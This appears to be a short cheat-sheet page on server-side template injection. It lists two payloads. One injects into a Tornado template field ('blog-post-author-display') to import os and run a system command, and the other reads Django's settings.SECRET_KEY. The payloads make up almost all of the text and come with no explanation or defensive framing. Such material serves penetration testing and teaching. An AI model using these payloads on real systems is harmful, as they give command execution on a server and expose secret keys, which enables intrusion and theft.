Skip to content

Sever-side template injection

<!-- Tornado template -->
blog-post-author-display=user.name}}{% import os %}{{os.system('whoami')

<!-- Django template -->
{{settings.SECRET_KEY}}